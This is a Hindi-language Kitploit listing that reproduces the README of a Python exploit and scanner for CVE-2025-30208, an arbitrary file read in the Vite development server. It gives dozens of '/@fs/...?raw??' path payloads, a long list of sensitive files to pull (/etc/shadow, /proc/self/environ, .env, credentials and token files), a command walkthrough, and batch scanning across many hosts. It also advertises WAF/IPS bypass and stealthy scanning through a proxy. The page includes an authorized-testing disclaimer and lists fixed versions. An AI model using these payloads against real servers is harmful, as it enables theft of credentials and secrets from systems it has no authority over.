Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 Vite विकास सर्वर (एक लोकप्रिय फ्रंटएंड बिल्ड टूल) में एक मध्यम-गंभीरता वाली मनमानी फ़ाइल पढ़ने की कमजोरी है। | Kitploit
उपकरण/GitHubGitHub/th-secforge/cve-2025-30208
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 Vite विकास सर्वर (एक लोकप्रिय फ्रंटएंड बिल्ड टूल) में एक मध्यम-गंभीरता वाली मनमानी फ़ाइल पढ़ने की कमजोरी है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔥 CVE-2025-30208 Vite मनमानी फ़ाइल पढ़ने की भेद्यता स्कैनर

Python License Security Status Modular

CVE-2025-30208 के लिए उन्नत भेद्यता स्कैनर जिसमें एंटरप्राइज़-ग्रेड सुविधाएँ हैं

Vite मनमानी फ़ाइल पढ़ने की भेद्यता का पता लगाने के लिए पेशेवर पैठ परीक्षण उपकरण

🚀 त्वरित आरंभ • 📋 विशेषताएँ • 🔧 उपयोग • 📊 उदाहरण • 🛡️ सुरक्षा


📖 अवलोकन

यह एक व्यापक भेद्यता स्कैनर है जो Vite विकास सर्वरों में CVE-2025-30208 भेद्यता का पता लगाने और उसका शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता Vite के फ़ाइल सिस्टम एंडपॉइंट के माध्यम से मनमानी फ़ाइल पढ़ने की पहुँच प्रदान करती है, जिससे संभावित रूप से संवेदनशील कॉन्फ़िगरेशन फ़ाइलें, स्रोत कोड और सिस्टम जानकारी उजागर हो सकती है।

🎯 यह उपकरण क्या करता है

  • नेटवर्क में कमज़ोर Vite इंस्टेंस का पता लगाता है
  • मनमानी फ़ाइल पढ़ने की भेद्यता का सुरक्षित तरीके से शोषण करता है
  • संवेदनशील फ़ाइलों और कॉन्फ़िगरेशन डेटा की खोज करता है
  • कई प्रारूपों (HTML, JSON, कंसोल) में निष्कर्षों की रिपोर्ट करता है
  • स्कैनिंग सत्रों और कॉन्फ़िगरेशन का प्रबंधन करता है
  • स्वचालित पुनर्प्रयास तंत्र के साथ त्रुटियों को सहजता से संभालता है

🏗️ मॉड्यूलर आर्किटेक्चर

उपकरण में अब बेहतर रखरखाव और विस्तारशीलता के लिए मॉड्यूलर आर्किटेक्चर है:

  • CVE-2025-30208.py - मुख्य स्कैनर एप्लिकेशन
  • payloads.py - उन्नत शोषण पेलोड (60+ विविधताएँ)
  • sensitive_files.py - व्यापक संवेदनशील फ़ाइल डेटाबेस (200+ फ़ाइलें)
  • html_template.py - उन्नत हैकर-शैली HTML रिपोर्टिंग टेम्पलेट

🚀 त्वरित आरंभ

पूर्वापेक्षाएँ

root@kitploit:~
pip3 install -r requirements.txt

मूल उपयोग

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 विशेषताएँ

🔍 मुख्य भेद्यता का पता लगाना

  • 60+ उन्नत पेलोड: अधिकतम पहचान के लिए व्यापक शोषण तकनीकें
  • स्मार्ट डिटेक्शन: गलत सकारात्मकता से बचने के लिए बुद्धिमान प्रतिक्रिया विश्लेषण
  • रीयल-टाइम सत्यापन: लक्ष्य प्रतिक्रियाओं का निरंतर सत्यापन
  • व्यापक परीक्षण: सभी ज्ञात कमज़ोर एंडपॉइंट का परीक्षण

🛡️ उन्नत सुरक्षा सुविधाएँ

  • प्रॉक्सी समर्थन: गुमनामी के लिए HTTP/HTTPS प्रॉक्सी कॉन्फ़िगरेशन
  • कस्टम हेडर: कस्टम HTTP हेडर के साथ WAF/IPS को बायपास करें
  • दर सीमित करना: पता लगाने से बचने के लिए कॉन्फ़िगर करने योग्य विलंब
  • सत्र प्रबंधन: स्कैनिंग सत्रों को सहेजें और पुनर्स्थापित करें
  • इनपुट सत्यापन: व्यापक पैरामीटर सत्यापन

🔧 उन्नत क्षमताएँ

  • बैच स्कैनिंग: कई लक्ष्यों की मल्टी-थ्रेडेड स्कैनिंग
  • संवेदनशील फ़ाइल खोज: 200+ संवेदनशील फ़ाइलों की स्वचालित खोज
  • कनेक्टिविटी परीक्षण: TCP/UDP/HTTP/HTTPS प्रोटोकॉल परीक्षण
  • त्रुटि पुनर्प्राप्ति: एक्सपोनेंशियल बैकऑफ़ के साथ स्वचालित पुनर्प्रयास
  • व्यापक लॉगिंग: टाइमस्टैम्प के साथ विस्तृत लॉग

📊 रिपोर्टिंग और आउटपुट

  • 🎨 उन्नत HTML रिपोर्ट: एनिमेशन के साथ सुंदर हैकर-शैली भेद्यता रिपोर्ट
  • JSON निर्यात: आगे के विश्लेषण के लिए संरचित डेटा
  • कंसोल आउटपुट: रंग-कोडित रीयल-टाइम फीडबैक
  • लॉग फ़ाइलें: विस्तृत ऑडिट ट्रेल
  • इंटरैक्टिव वेब इंटरफ़ेस: रिपोर्ट देखने के लिए अंतर्निहित वेब सर्वर

🔧 उपयोग गाइड

1. मूल कॉन्फ़िगरेशन

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. भेद्यता परीक्षण

root@kitploit:~
CVE-2025-30208 > run

# विस्तृत आउटपुट के लिए वर्बोज़ मोड सक्षम करें
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. बैच स्कैनिंग

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[समाप्त करने के लिए Enter दो बार दबाएँ]

4. संवेदनशील फ़ाइल खोज

root@kitploit:~
CVE-2025-30208 > scan

5. उन्नत कॉन्फ़िगरेशन

root@kitploit:~
# प्रॉक्सी कॉन्फ़िगर करें
CVE-2025-30208 > proxy
प्रॉक्सी दर्ज करें: http://127.0.0.1:8080

# कस्टम हेडर सेट करें
CVE-2025-30208 > headers
हेडर दर्ज करें: {"User-Agent": "Custom Scanner"}

# दर सीमित करना कॉन्फ़िगर करें
CVE-2025-30208 > rate
दर सीमा दर्ज करें: 1.0

6. उन्नत HTML रिपोर्टिंग

root@kitploit:~
# सुंदर HTML रिपोर्ट जनरेट करें
CVE-2025-30208 > pull

# रिपोर्ट देखने के लिए वेब सर्वर शुरू करें
CVE-2025-30208 > web

# विशिष्ट पोर्ट पर वेब सर्वर शुरू करें
CVE-2025-30208 > web 8081

# वेब सर्वर बंद करें
CVE-2025-30208 > web off

📊 कमांड संदर्भ


⚙️ कॉन्फ़िगरेशन विकल्प


🎨 उन्नत पेलोड सिस्टम

स्कैनर अब payloads.py में संगठित 60+ विभिन्न पेलोड विविधताओं का उपयोग करता है:

प्राथमिक @fs पेलोड

root@kitploit:~
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

विस्तारित पैरामीटर विविधताएँ

root@kitploit:~
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite-विशिष्ट विविधताएँ

root@kitploit:~
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

मॉड्यूल सिस्टम विविधताएँ

root@kitploit:~
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

वैकल्पिक एंडपॉइंट

root@kitploit:~
/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 उन्नत संवेदनशील फ़ाइल खोज

उपकरण अब sensitive_files.py में संगठित 200+ संवेदनशील फ़ाइलों का परीक्षण करता है:

🖥️ सिस्टम फ़ाइलें (Linux/Unix)

  • /etc/passwd - उपयोगकर्ता खाता जानकारी
  • /etc/shadow - एन्क्रिप्टेड पासवर्ड डेटा
  • /etc/services - नेटवर्क सेवाएँ
  • /etc/hosts - होस्टनाम मैपिंग
  • /etc/fstab - फ़ाइल सिस्टम तालिका
  • /etc/ssh/sshd_config - SSH सर्वर कॉन्फ़िगरेशन
  • /etc/crontab - सिस्टम क्रॉन जॉब्स
  • /etc/sudoers - Sudo कॉन्फ़िगरेशन

📊 प्रक्रिया जानकारी

  • /proc/version - कर्नेल संस्करण
  • /proc/cpuinfo - CPU जानकारी
  • /proc/meminfo - मेमोरी जानकारी
  • /proc/self/environ - प्रक्रिया पर्यावरण
  • /proc/self/cmdline - प्रक्रिया कमांड लाइन
  • /proc/net/tcp - TCP कनेक्शन
  • /proc/net/udp - UDP कनेक्शन

⚙️ एप्लिकेशन कॉन्फ़िगरेशन

  • .env - पर्यावरण चर
  • .env.local - स्थानीय पर्यावरण
  • .env.production - उत्पादन पर्यावरण
  • config.json - एप्लिकेशन कॉन्फ़िगरेशन
  • settings.json - एप्लिकेशन सेटिंग्स
  • application.properties - Spring कॉन्फ़िगरेशन
  • application.yml - YAML कॉन्फ़िगरेशन
  • database.yml - डेटाबेस कॉन्फ़िगरेशन
  • secrets.json - गुप्त प्रबंधन

📦 Node.js / JavaScript फ़ाइलें

  • package.json - Node.js निर्भरताएँ
  • package-lock.json - लॉक की गई निर्भरताएँ
  • yarn.lock - Yarn लॉक फ़ाइल
  • vite.config.js - Vite कॉन्फ़िगरेशन
  • vite.config.ts - TypeScript Vite config
  • tsconfig.json - TypeScript कॉन्फ़िगरेशन
  • webpack.config.js - Webpack कॉन्फ़िगरेशन
  • next.config.js - Next.js कॉन्फ़िगरेशन
  • nuxt.config.js - Nuxt.js कॉन्फ़िगरेशन
  • angular.json - Angular कॉन्फ़िगरेशन
  • vue.config.js - Vue.js कॉन्फ़िगरेशन
  • rollup.config.js - Rollup कॉन्फ़िगरेशन
  • eslint.config.js - ESLint कॉन्फ़िगरेशन

🔧 Git फ़ाइलें

  • .git/config - Git कॉन्फ़िगरेशन
  • .gitignore - Git अनदेखा नियम
  • .gitattributes - Git विशेषताएँ
  • .gitmodules - Git उपमॉड्यूल
  • .git/HEAD - वर्तमान शाखा
  • .git/logs/HEAD - Git लॉग
  • .git/refs/heads/master - मास्टर शाखा
  • .git/refs/heads/main - मुख्य शाखा

📚 दस्तावेज़ीकरण फ़ाइलें

  • README.md - परियोजना दस्तावेज़ीकरण
  • CHANGELOG.md - परिवर्तन लॉग
  • LICENSE - लाइसेंस जानकारी
  • CONTRIBUTING.md - योगदान दिशानिर्देश
  • AUTHORS - लेखक जानकारी
  • TODO.md - कार्य सूची
  • ROADMAP.md - विकास रोडमैप

🐳 Docker फ़ाइलें

  • Dockerfile - Docker कॉन्फ़िगरेशन
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - ओवरराइड कॉन्फ़िगरेशन
  • .dockerignore - Docker अनदेखा नियम
  • docker-compose.prod.yml - उत्पादन कॉन्फ़िगरेशन
  • docker-compose.dev.yml - विकास कॉन्फ़िगरेशन

🌐 वेब सर्वर कॉन्फ़िगरेशन

  • nginx.conf - Nginx कॉन्फ़िगरेशन
  • apache2.conf - Apache कॉन्फ़िगरेशन
  • httpd.conf - HTTP डेमॉन कॉन्फ़िगरेशन
  • .htaccess - Apache एक्सेस नियंत्रण
  • web.config - IIS कॉन्फ़िगरेशन
  • robots.txt - खोज इंजन निर्देश
  • sitemap.xml - साइट संरचना
  • manifest.json - वेब ऐप मैनिफेस्ट
  • sw.js - सेवा वर्कर
  • firebase.json - Firebase कॉन्फ़िगरेशन
  • firebase.rules - Firebase सुरक्षा नियम

🪟 Windows फ़ाइलें

  • boot.ini - बूट कॉन्फ़िगरेशन
  • autoexec.bat - स्वचालित निष्पादन स्क्रिप्ट
  • system.ini - सिस्टम कॉन्फ़िगरेशन
  • win.ini - Windows कॉन्फ़िगरेशन
  • Users - उपयोगकर्ता निर्देशिकाएँ
  • Windows - सिस्टम फ़ाइलें
  • Program Files - एप्लिकेशन निर्देशिकाएँ

🍎 macOS फ़ाइलें

  • System - सिस्टम फ़ाइलें
  • Library - लाइब्रेरी फ़ाइलें
  • Applications - एप्लिकेशन फ़ाइलें
  • private/etc/hosts - होस्ट फ़ाइल
  • private/etc/passwd - उपयोगकर्ता खाते

🗄️ डेटाबेस फ़ाइलें

  • database.db - SQLite डेटाबेस
  • database.sqlite - SQLite डेटाबेस
  • data.db - डेटा डेटाबेस
  • dump.sql - डेटाबेस डंप
  • schema.sql - डेटाबेस स्कीमा
  • migrations - डेटाबेस माइग्रेशन

📝 लॉग फ़ाइलें

  • logs - लॉग निर्देशिका
  • error.log - त्रुटि लॉग
  • access.log - एक्सेस लॉग
  • app.log - एप्लिकेशन लॉग
  • debug.log - डीबग लॉग
  • combined.log - संयुक्त लॉग

💾 बैकअप फ़ाइलें

  • backup - बैकअप निर्देशिका
  • backup.sql - डेटाबेस बैकअप
  • backup.zip - संपीड़ित बैकअप
  • dump - डेटा डंप
  • export - डेटा निर्यात

🔒 सुरक्षा और प्रमाणीकरण

  • auth.json - प्रमाणीकरण कॉन्फ़िगरेशन
  • credentials.json - क्रेडेंशियल भंडारण
  • keys.json - कुंजी प्रबंधन
  • tokens.json - टोकन भंडारण
  • jwt.json - JWT कॉन्फ़िगरेशन
  • oauth.json - OAuth कॉन्फ़िगरेशन

🔌 API और सेवा फ़ाइलें

  • api.json - API कॉन्फ़िगरेशन
  • swagger.json - API दस्तावेज़ीकरण
  • openapi.json - OpenAPI विनिर्देशन
  • graphql.json - GraphQL कॉन्फ़िगरेशन
  • schema.json - API स्कीमा

☁️ क्लाउड और डिप्लॉयमेंट

  • cloudformation.yml - AWS CloudFormation
  • serverless.yml - सर्वरलेस कॉन्फ़िगरेशन
  • terraform.tf - Terraform कॉन्फ़िगरेशन
  • kubernetes.yml - Kubernetes कॉन्फ़िगरेशन
  • k8s.yml - Kubernetes कॉन्फ़िगरेशन

📊 मॉनिटरिंग और एनालिटिक्स

  • analytics.json - एनालिटिक्स कॉन्फ़िगरेशन
  • monitoring.json - मॉनिटरिंग सेटअप
  • metrics.json - मीट्रिक्स कॉन्फ़िगरेशन
  • telemetry.json - टेलीमेट्री डेटा

🎨 उन्नत HTML रिपोर्टिंग

उपकरण अब सुंदर हैकर-शैली HTML रिपोर्ट जनरेट करता है जिसमें:

✨ दृश्य सुविधाएँ

  • मैट्रिक्स-शैली पृष्ठभूमि एनिमेटेड गिरते पात्रों के साथ
  • ग्रेडिएंट एनिमेशन और चमकदार प्रभाव
  • इंटरैक्टिव तत्व होवर प्रभावों के साथ
  • उत्तरदायी डिज़ाइन सभी उपकरणों के लिए
  • डार्क थीम सुरक्षा पेशेवरों के लिए अनुकूलित

📊 इंटरैक्टिव आँकड़े

  • रीयल-टाइम काउंटर कुल लीक और उजागर बाइट्स के लिए
  • गंभीरता संकेतक रंग कोडिंग के साथ
  • प्रत्येक लीक के लिए कॉपी सुविधा
  • सामग्री पूर्वावलोकन आकार और पंक्ति गणना के साथ
  • विस्तार योग्य अनुभाग विस्तृत विश्लेषण के लिए

🔧 तकनीकी सुविधाएँ

  • Google Fonts एकीकरण (JetBrains Mono, Orbitron)
  • CSS एनिमेशन और संक्रमण
  • JavaScript इंटरैक्टिविटी बेहतर UX के लिए
  • मोबाइल-उत्तरदायी डिज़ाइन
  • क्रॉस-ब्राउज़र संगतता

🌐 वेब सर्वर एकीकरण

  • रिपोर्ट देखने के लिए अंतर्निहित HTTP सर्वर
  • स्वचालित ब्राउज़र खोलना
  • पोर्ट कॉन्फ़िगरेशन विकल्प
  • आसान आरंभ/रोकें कमांड

🛡️ त्रुटि प्रबंधन और पुनर्प्राप्ति

स्वचालित पुनर्प्रयास तंत्र

  • 3 पुनर्प्रयास प्रयास: असफल अनुरोधों को स्वचालित रूप से पुनः प्रयास किया जाता है
  • एक्सपोनेंशियल बैकऑफ़: पुनर्प्रयासों के बीच बढ़ते विलंब
  • स्मार्ट त्रुटि वर्गीकरण: विभिन्न त्रुटि प्रकारों के लिए अलग-अलग प्रबंधन
  • सहज पुनर्प्राप्ति: त्रुटियों के बाद उपकरण संचालन जारी रखता है

त्रुटि श्रेणियाँ

  • NetworkError: कनेक्शन, टाइमआउट, प्रॉक्सी समस्याएँ
  • ConfigurationError: अमान्य सेटिंग्स और पैरामीटर
  • ValidationError: अमान्य इनपुट पैरामीटर
  • ScannerError: सामान्य स्कैनर त्रुटियाँ

सत्यापन सुविधाएँ

  • रीयल-टाइम इनपुट सत्यापन: उपयोग से पहले सभी पैरामीटर मान्य किए जाते हैं
  • कॉन्फ़िगरेशन सत्यापन: स्कैनिंग से पहले पूर्ण सत्यापन
  • कनेक्टिविटी परीक्षण: TCP/UDP/HTTP/HTTPS प्रोटोकॉल परीक्षण
  • प्रॉक्सी सत्यापन: प्रॉक्सी URL प्रारूप सत्यापन

📁 आउटपुट फ़ाइलें


📝 प्रभावित संस्करण

🚨 कमज़ोर संस्करण

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ अप्रभावित संस्करण

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ सुरक्षा और नैतिक उपयोग

⚠️ महत्वपूर्ण सुरक्षा नोट्स

  • केवल अधिकृत परीक्षण: केवल उन प्रणालियों पर उपयोग करें जिनके आप स्वामी हैं या जिनका परीक्षण करने की आपको स्पष्ट अनुमति है
  • जिम्मेदार प्रकटीकरण: सिस्टम मालिकों को भेद्यताओं की रिपोर्ट करें
  • दर सीमित करना: लक्ष्यों को ओवरलोड करने से बचने के लिए उपयुक्त विलंब का उपयोग करें
  • प्रॉक्सी उपयोग: जहाँ उचित हो, गुमनामी के लिए प्रॉक्सी का उपयोग करने पर विचार करें
  • कानूनी अनुपालन: स्थानीय कानूनों और विनियमों का अनुपालन सुनिश्चित करें

🔒 सर्वोत्तम अभ्यास

  • परीक्षण से पहले हमेशा लिखित अनुमति प्राप्त करें
  • केवल नियंत्रित वातावरण में उपयोग करें
  • सभी परीक्षण गतिविधियों का दस्तावेज़ीकरण करें
  • दर सीमा और सिस्टम संसाधनों का सम्मान करें
  • निष्कर्षों की जिम्मेदारी से रिपोर्ट करें

🚀 उन्नत उपयोग उदाहरण

उदाहरण 1: व्यापक नेटवर्क स्कैन

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

उदाहरण 2: प्रॉक्सी के साथ छिपकर स्कैनिंग

root@kitploit:~
CVE-2025-30208 > proxy
प्रॉक्सी दर्ज करें: http://127.0.0.1:8080
CVE-2025-30208 > headers
हेडर दर्ज करें: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

उदाहरण 3: उन्नत रिपोर्टिंग वर्कफ़्लो

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

उदाहरण 4: संवेदनशील फ़ाइल खोज

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ परियोजना संरचना

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # मुख्य स्कैनर एप्लिकेशन
├── payloads.py                # उन्नत शोषण पेलोड (60+)
├── sensitive_files.py         # संवेदनशील फ़ाइल डेटाबेस (200+)
├── html_template.py           # उन्नत HTML रिपोर्टिंग टेम्पलेट
├── README.md                  # यह दस्तावेज़ीकरण
├── requirements.txt           # Python निर्भरताएँ
├── logs/                      # लॉग फ़ाइल निर्देशिका
├── data_leak.html            # जनरेट की गई HTML रिपोर्ट
├── data_leak.json            # जनरेट की गई JSON रिपोर्ट
└── session.json              # सहेजे गए सत्र कॉन्फ़िगरेशन

🤝 योगदान

हम इस उपकरण को बेहतर बनाने के लिए योगदान का स्वागत करते हैं:

  1. रिपॉजिटरी को फ़ोर्क करें
  2. एक फीचर ब्रांच बनाएँ
  3. अपने परिवर्तन करें
  4. अच्छी तरह से परीक्षण करें
  5. पुल रिक्वेस्ट सबमिट करें

योगदान के क्षेत्र

  • payloads.py में नई पेलोड विविधताएँ
  • sensitive_files.py में अतिरिक्त संवेदनशील फ़ाइल पैटर्न
  • html_template.py में उन्नत HTML टेम्पलेट
  • बेहतर त्रुटि प्रबंधन
  • प्रदर्शन अनुकूलन
  • दस्तावेज़ीकरण सुधार

📄 लाइसेंस

यह परियोजना केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए लाइसेंस प्राप्त है।

⚠️ कानूनी अस्वीकरण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए है। किसी भी सिस्टम का परीक्षण करने से पहले उपयोगकर्ता यह सुनिश्चित करने के लिए जिम्मेदार हैं कि उनके पास उचित प्राधिकरण है। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।


👨‍💻 लेखक

ThemeHackers

GitHub

सुरक्षा शोधकर्ता और पैठ परीक्षक


⭐ यदि इस उपकरण ने आपकी मदद की, तो कृपया इसे एक स्टार दें! ⭐

सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया

टूल डाउनलोड करें
कमांडविवरणउदाहरण
set <option> <value>कॉन्फ़िगरेशन विकल्प सेट करेंset RHOST 192.168.1.100
show optionsवर्तमान सेटिंग्स प्रदर्शित करेंshow options
editइंटरैक्टिव विकल्प संपादकedit
run / exploitभेद्यता परीक्षण चलाएँrun
batchएकाधिक लक्ष्यों की बैच स्कैनिंगbatch
scanसंवेदनशील फ़ाइलों की खोजscan
pullपरिणाम HTML/JSON में निर्यात करेंpull
web [on|off|port]HTML रिपोर्ट के लिए वेब सर्वरweb 8080
saveसत्र कॉन्फ़िगरेशन सहेजेंsave
loadसत्र कॉन्फ़िगरेशन लोड करेंload
testलक्ष्य से कनेक्टिविटी का परीक्षण करेंtest
validateवर्तमान कॉन्फ़िगरेशन मान्य करेंvalidate
verboseवर्बोज़ मोड टॉगल करेंverbose
proxyप्रॉक्सी सेटिंग्स कॉन्फ़िगर करेंproxy
headersकस्टम HTTP हेडर सेट करेंheaders
rateदर सीमित करना कॉन्फ़िगर करेंrate
logलॉगिंग जानकारी दिखाएँlog
help / ?सहायता दिखाएँhelp
exit / quitउपकरण से बाहर निकलेंexit
विकल्पविवरणडिफ़ॉल्टसत्यापन
RHOSTलक्ष्य होस्ट/IP पता-होस्टनाम/IP सत्यापन
RPORTलक्ष्य पोर्ट संख्या-पोर्ट रेंज (1-65535)
FILEPATHपरीक्षण करने के लिए फ़ाइल पथetc/passwdपथ सत्यापन
PROXYHTTP/HTTPS प्रॉक्सी URL-URL प्रारूप सत्यापन
VERBOSEवर्बोज़ आउटपुट सक्षम करेंfalseबूलियन सत्यापन
RATE_LIMITअनुरोधों के बीच विलंब (सेकंड)0.3संख्यात्मक सत्यापन
THREADSबैच स्कैनिंग के लिए थ्रेड्स की संख्या5पूर्णांक सत्यापन
TIMEOUTअनुरोध टाइमआउट (सेकंड)5पूर्णांक सत्यापन
CUSTOM_HEADERSकस्टम HTTP हेडर (JSON){}JSON प्रारूप सत्यापन
  • prettier.config.js - Prettier कॉन्फ़िगरेशन
  • jest.config.js - Jest कॉन्फ़िगरेशन
  • babel.config.js - Babel कॉन्फ़िगरेशन
  • tailwind.config.js - Tailwind CSS कॉन्फ़िगरेशन
  • फ़ाइलविवरणप्रारूप
    data_leak.htmlउन्नत हैकर-शैली HTML भेद्यता रिपोर्टHTML
    data_leak.jsonसंरचित JSON निर्यातJSON
    sensitive_files_discovery.jsonखोजी गई संवेदनशील फ़ाइलेंJSON
    session.jsonसहेजा गया सत्र कॉन्फ़िगरेशनJSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.logविस्तृत ऑडिट लॉगटेक्स्ट